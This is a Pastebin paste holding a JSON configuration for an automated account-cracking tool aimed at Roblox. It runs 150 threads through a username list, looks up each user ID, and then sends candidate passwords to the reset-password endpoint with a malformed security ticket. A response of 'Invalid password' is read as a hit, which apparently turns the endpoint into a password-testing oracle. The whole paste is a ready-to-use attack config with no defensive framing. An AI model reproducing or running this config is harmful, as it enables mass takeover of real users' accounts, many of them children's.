Advertisement
Guest User

Untitled

a guest
Oct 3rd, 2018
171
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.13 KB | None | 0 0
  1. {
  2. "General": {
  3. "name": "Roblox (Proxyless)",
  4. "proxyType": "Proxyless",
  5. "comboType": "Username",
  6. "threads": "150"
  7. },
  8. "Requests": [
  9. {
  10. "actionUrl": "https://www.roblox.com/users/profile?username=<USER>",
  11. "method": "GET",
  12. "autoRedirect": false,
  13. "userAgent": "Roblox/WinInet",
  14. "successKeys": ["/users/"],
  15. "failureKeys": ["/users/0/profile", "Page cannot be found or no longer exists", "request-error", "RobloxDefaultErrorPage"],
  16. "regex": [
  17. {
  18. "name": "userId",
  19. "pattern": "users\/([^\/]*)",
  20. "usedFor": "postData"
  21. }
  22. ]
  23. },
  24. {
  25. "actionUrl": "https:\/\/www.roblox.com\/login\/reset-password",
  26. "method": "POST",
  27. "userAgent": "Roblox/WinInet",
  28. "postData": "UserId=+userId|1+&Version=2&NewPassword=<PASS>&NewPasswordRepeated=<PASS>&Ticket=%0D%0A%7B%7D%0D%0A",
  29. "contentType": "application/x-www-form-urlencoded",
  30. "successKeys": ["Invalid password"],
  31. "failureKeys": ["load this security ticket", "Page cannot be found or no longer exists", "request-error", "RobloxDefaultErrorPage"]
  32. }
  33. ]
  34. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement